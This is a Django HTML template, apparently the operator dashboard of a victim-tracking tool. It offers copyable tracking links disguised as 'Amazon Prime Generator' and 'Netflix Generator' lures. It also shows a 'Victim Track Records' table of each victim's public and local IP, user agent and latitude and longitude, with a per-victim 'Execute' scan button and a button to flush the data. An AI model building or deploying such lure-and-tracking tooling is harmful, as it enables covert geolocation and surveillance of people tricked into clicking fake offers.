{% extends "base.html" %} {% block content %}

{% if request.user.profile.darkmode %}

  <script>
    var options = {
    bottom: '64px', // default: '32px'
    right: 'unset', // default: '32px'
    left: '32px', // default: 'unset'
    time: '0.5s', // default: '0.3s'
    mixColor: '#fff', // default: '#fff'
    backgroundColor: '#fff',  // default: '#fff'
    buttonColorDark: '#100f2c',  // default: '#100f2c'
    buttonColorLight: '#fff', // default: '#fff'
    saveInCookies: true, // default: true,
    label: '🌓', // default: ''
    autoMatchOsTheme: true // default: true
  }
  const darkmode = new Darkmode(options);
  </script>

<style>

  .card {
  background-color: #111111;
  }
    .card-header {
    color: white;
  }

  .card-body p {
    color: white;
  }

  .col-md-3 {
    color: white;
  }

</style>

  {% endif %}

<style>

  body, html {
    height: 100%;
    background-repeat: no-repeat;
}
  .masthead {
  height: 80vh;
  min-height: 500px;
  background-size: cover;
  background-position: center;
  background-repeat: no-repeat;
}
</style>


<script>

function refresh(){
  document.location.reload();
  }
</script>

<center>


  <br>
  <div class="table-responsive table-body">

    <table class="table table-hover table-striped table-light table-bordered">
      <thead>
        <tr>
          <th scope="col"><center>Template</center></th>
          <th scope="col"><center>Tracking URL</center></th>
          <th scope="col"></th>
        </tr>
      </thead>
      <tbody>
        <tr>
          <td><center>Amazon Prime Generator</center></td>
          <td><center>{{url.1}}</center></td>
          <td><center><button type="submit" value="query" id="btn" data-clipboard-text="{{url.1}}" data-toggle="button" aria-pressed="false" class="btn btn-primary btn-sm">Copy</button></center></td>
        </tr>
        <tr>
          <td><center>Netflix Generator</center></td>
          <td><center>{{url.2}}</center></td>
          <td><center><button type="submit" value="query" id="btn2" data-clipboard-text="{{url.2}}" data-toggle="button" aria-pressed="false" class="btn btn-primary btn-sm">Copy</button></center></td>
        </tr>
      </tbody>
    </table>

    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js"></script>

<script>
  var btn = document.getElementById('btn');
  var clipboard = new ClipboardJS(btn);

  clipboard.on('success', function(e) {
      console.log(e);
  });

  clipboard.on('error', function(e) {
      console.log(e);
  });
  </script>

<script>
  var btn = document.getElementById('btn2');
  var clipboard = new ClipboardJS(btn);

  clipboard.on('success', function(e) {
      console.log(e);
  });

  clipboard.on('error', function(e) {
      console.log(e);
  });
  </script>
  </div>
  <br>
  
  {% if victim == None %}
    <a href="javascript:refresh();" type="button" class="btn btn-secondary">Refresh</a>
  {% endif %}

{% if victim %}
  <br>
<div class="card text-center">
  <div class="card-header">
    Victim Track Records
  </div></div>
<div class="table-responsive table-body">
  <table class="table table-hover table-striped table-light table-bordered">
    <thead>
      <tr>
        <th class="col-md-3" scope="col">Public IP</th>
        <th class="col-md-3" scope="col">Local IP</th>
        <th class="col-md-3" scope="col">User Agent</th>
        <th class="col-md-3" scope="col">Latitude</th>
        <th class="col-md-3" scope="col">Longitude</th>
        <th class="col-md-3" scope="col">Scan</th>
      </tr>
    </thead>
    <tbody>

    {% for victims in victim %}
      <tr>
      <th scope="row">{{victims.0}}</th>               
      <td>{{victims.1}}</td>
      <td>{{victims.2}}</td>
      <td>{{victims.3}}</td>
      <td>{{victims.4}}</td>

      {% load extras %}

      <form id="searchform" name="searchform" method="POST" action="/" > {% csrf_token %}
       
        {% define victims.0 as publicip %}
        {% defines victims.3 as latitude %}
        {% defines victims.4 as longitude %}
        
        <input hidden name="query" id="query" value="{{publicip|add:latitude|add:longitude}}"> 
        <input type="hidden" name="g-recaptcha-response" id="g-recaptcha-token" value="" />
        <button id="recaptcha" class="g-recaptcha" data-sitekey="6LdcXqUZAAAAAP7lK_k0muU99TX9UTnXZJh-VmVw" data-callback='onSubmit' hidden>Submit</button>
      <td><button type="button" onclick="javascript:document.getElementById('recaptcha').click();" value="query" class="btn btn-primary btn-sm">Execute</button></td>
      </form>
      </tr>
    {% endfor %}
    </tbody>
  </table>
</div>
<br>
<br>
<script>
    function onSubmit(token) {
      if("{{victims.0}}" != ""){
      document.getElementById("g-recaptcha-token").value=token;
      document.getElementById("searchform").submit();
      }
    }
  </script>
<script src="https://www.google.com/recaptcha/api.js?render=6LdcXqUZAAAAAP7lK_k0muU99TX9UTnXZJh-VmVw"></script>

<script> 
        function Confirm() { 
            var result = confirm("Do you want to flush all Victim Data?"); 
            if (result == true) { 
                document.getElementById("flush").value = "Confirm";
                document.getElementById("flushdb").submit();
                document.getElementById('recaptcha').click()
                return true;
            }else{
              return false;
            }
        } 
  </script>
<table>
<tr>
  <td style="padding-right:10px"><a href="javascript:refresh()" type="button" class="btn btn-secondary">Refresh</a></td>
<td>
<form id="flushdb" name="flushdb" method="POST" action=""> {% csrf_token %}
  <input type="submit" width="100px" id="flush" name="flush" value="Flush" onclick="return Confirm();" class="btn btn-danger"></input>  
</form>
</td>
</tr> 
</table>
{% endif %}
</center>

{% endblock %}